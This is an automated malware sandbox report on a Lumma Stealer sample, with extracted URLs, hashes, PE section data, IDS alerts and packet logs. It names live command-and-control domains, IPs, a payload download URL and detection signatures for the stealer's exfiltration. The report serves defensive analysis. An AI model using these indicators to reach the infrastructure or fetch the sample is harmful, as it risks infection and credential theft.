                                                                                                                  https://lev-tolstoi.com/4KDKJjRzm8.exe, 00000000.00000003.1539369110.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1610249625.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614778336.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1582545384.0000000001370000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://store.steampowered.com/privacy_agreement/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/points/shop/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl04KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://sketchfab.com4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.ecosia.org/newtab/4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://lv.queniujq.cn4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br4KDKJjRzm8.exe, 00000000.00000003.1515973644.0000000005D46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.youtube.com/4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580888
Start date and time: 2024-12-26 12:53:10 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4KDKJjRzm8.exe (renamed because original name is a hash value)
Original Sample Name: 6be43af1d47558e4993b9c341da5a653.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 4KDKJjRzm8.exe
Time | Type | Description
06:54:05 | API Interceptor | 16x Sleep call for process: 4KDKJjRzm8.exe modified
                                                                                                                                                                                                                                                      HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 23.44.201.30
                                                                                                                                                                                                                                                      CLOUDFLARENETUSP0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.113
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                      • 172.67.150.49
                                                                                                                                                                                                                                                      XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.165.185
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.11.101
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.11.101
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Zun6NRK3q3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      P0SJULJxI0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      b0ho5YYSdo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      r06aMlvVyM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      XM6cn2uNux.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      ZX2M0AXZ56.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9480945654813215
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 4KDKJjRzm8.exe
File size: 1'875'456 bytes
MD5: 6be43af1d47558e4993b9c341da5a653
SHA1: 0bef6b68199ee1f205326d3289b39102978ec1f5
SHA256: 7e13dd0f50e0ded479413d1061d1d2f73fd2e51639e8b29b22776b4d0ab5368d
SHA512: 28d30e5d6d6c39eebb4508fce49c40bb35b6075a6b523ca8a9f643b1930fc7a49406427317fffccb374314ec59e50d004ddf6ef7082ce532b1858c112ecc05e4
SSDEEP: 24576:14wJZdyAhKE3ZKDyW8UxZ3wiHl1DcFGK1aRV42zbLgpLfuU2mY5A5r909AsaFXLh:KwJWLB8iFxK846QKB5e9OAs8Y
TLSH: C39533139D07E02FF11EA534110B6FE7C9FDFA254DD8A1B87E814A9CAC1F899405A4BE
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................I...........@...........................J.....<.....@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x89e000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [ebx], cl
                                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                                      add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      pop es
                                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add al, 0Ah
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], cl
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                                      add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x52000 | 0x26400 | c337a537e31cd051ecd67ff43b1876e4 | False | 0.9995340584150327 | data | 7.979083511203261 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x55000 | 0x2a8000 | 0x200 | cff1718d22d7f5e9397238801f588814 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| jwydwysy | 0x2fd000 | 0x1a0000 | 0x19fe00 | fd92823c7e5a612294c5a67c5fe8729a | False | 0.9944206492335438 | data | 7.9543925612046 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| pczmnouq | 0x49d000 | 0x1000 | 0x400 | 035c9546444b9ebcd53b09d7c5d1ac27 | False | 0.802734375 | data | 6.25063174598312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x49e000 | 0x3000 | 0x2200 | 4caf1213ba53d82c0de0a958b58f246a | False | 0.06089154411764706 | DOS executable (COM) | 0.7888011260555085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T12:54:06.257510+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.9 | 50508 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.397092+0100 | 2058502 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) | 1 | 192.168.2.9 | 59931 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.767453+0100 | 2058492 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) | 1 | 192.168.2.9 | 54260 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:06.907983+0100 | 2058500 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) | 1 | 192.168.2.9 | 52498 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.050281+0100 | 2058510 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) | 1 | 192.168.2.9 | 50519 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.191673+0100 | 2058484 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) | 1 | 192.168.2.9 | 56553 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.334564+0100 | 2058512 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) | 1 | 192.168.2.9 | 60232 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:07.476243+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.9 | 53558 | 1.1.1.1 | 53 | UDP
2024-12-26T12:54:09.261620+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
2024-12-26T12:54:10.065762+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.9 | 49722 | 23.55.153.106 | 443 | TCP
2024-12-26T12:54:11.746899+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:12.519459+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:12.519459+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:13.868234+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:14.667605+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:14.667605+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49734 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:16.670208+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49740 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:18.942161+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49746 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:21.673727+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49752 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:24.413493+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49761 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:25.170601+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49761 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:26.955349+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49768 | 172.67.157.254 | 443 | TCP
2024-12-26T12:54:30.039493+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49776 | 172.67.157.254 | 443 | TCP
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906835079 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906857014 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906867027 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906893969 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906909943 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906924009 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906953096 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906961918 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.906970024 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907006025 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907015085 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907051086 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907088995 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907165051 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907181978 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907191992 CET49734443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:14.907197952 CET44349734172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365144968 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365216017 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365303040 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365658998 CET49740443192.168.2.9172.67.157.254
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:15.365681887 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.670032024 CET44349740172.67.157.254192.168.2.9
                                                                                                                                                                                                                                                      Dec 26, 2024 12:54:16.670207977 CET49740443192.168.2.9172.67.157.254
